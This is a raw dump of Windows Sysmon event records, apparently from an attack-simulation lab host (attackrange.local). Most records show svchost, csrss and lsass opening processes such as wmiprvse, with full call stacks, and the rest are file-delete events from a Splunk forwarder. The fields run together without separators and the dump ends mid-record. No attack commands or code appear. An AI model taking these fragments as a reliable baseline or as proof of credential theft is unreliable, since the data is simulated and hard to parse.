15:05:56.295{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343650Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:56.295{B81B27B7-4012-611D-0B00-00000000C801}6361736C:\Windows\system32\lsass.exe{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343649Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:56.279{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-7454-613B-61B4-03000000C801}5796C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343648Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:56.279{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-7454-613B-61B4-03000000C801}5796C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343647Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:56.279{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-7454-613B-61B4-03000000C801}5796C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343646Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:56.279{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-7454-613B-61B4-03000000C801}5796C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343645Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:56.279{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-7454-613B-61B4-03000000C801}5796C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343644Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:56.279{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-7454-613B-61B4-03000000C801}5796C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343643Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:56.279{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-7454-613B-61B4-03000000C801}5796C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343642Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:56.279{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-7454-613B-61B4-03000000C801}5796C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343641Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:56.279{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-7454-613B-61B4-03000000C801}5796C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343640Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:56.279{B81B27B7-4012-611D-0B00-00000000C801}6361736C:\Windows\system32\lsass.exe{B81B27B7-7454-613B-61B4-03000000C801}5796C:\Windows\system32\wbem\wmiprvse.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343639Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:56.279{B81B27B7-4012-611D-0B00-00000000C801}6361736C:\Windows\system32\lsass.exe{B81B27B7-7454-613B-61B4-03000000C801}5796C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343638Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:56.263{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343637Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:56.263{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343636Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:56.263{B81B27B7-4012-611D-0B00-00000000C801}6361736C:\Windows\system32\lsass.exe{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343635Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:56.232{B81B27B7-4013-611D-1600-00000000C801}1196704C:\Windows\system32\svchost.exe{B81B27B7-7454-613B-61B4-03000000C801}5796C:\Windows\system32\wbem\wmiprvse.exe0x101541C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+20fee|C:\Windows\system32\wbem\wmiprvsd.dll+43f7|C:\Windows\system32\wbem\wmiprvsd.dll+15538|C:\Windows\system32\wbem\wmiprvsd.dll+1498a|C:\Windows\system32\wbem\wmiprvsd.dll+146e6|C:\Windows\system32\wbem\wmiprvsd.dll+140fe|C:\Windows\system32\wbem\wbemcore.dll+2227|C:\Windows\system32\wbem\wbemcore.dll+13f4|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343634Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:56.216{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-7454-613B-61B4-03000000C801}5796C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343633Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:56.195{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-7454-613B-61B4-03000000C801}5796C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035343632Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:56.195{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-7454-613B-61B4-03000000C801}5796C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343631Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:56.179{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343630Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:56.179{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343629Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:56.179{B81B27B7-4012-611D-0B00-00000000C801}6361736C:\Windows\system32\lsass.exe{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035343628Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:56.064{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A088A3129EF050B123A7E9F08BA5426F,SHA256=5E13F01760B7F0C42FDC84E29FFAAF247CEB1F3A87FADD381E1C47374D0C8081,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343665Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:57.511{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FE171010072A0826BDEA52ABC89C3CCE,SHA256=19F2B998729E725E0C9952ED5EDA6FD09686FB733D99E27FCDDF23F106A288A8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343664Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:57.511{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=18544D2C76469FAD30C0CD47F3156974,SHA256=69177452B2D8375EA68D71FD0742FB715803C6E59CBE5168F62B75DB96AD63FE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343663Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:57.510{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 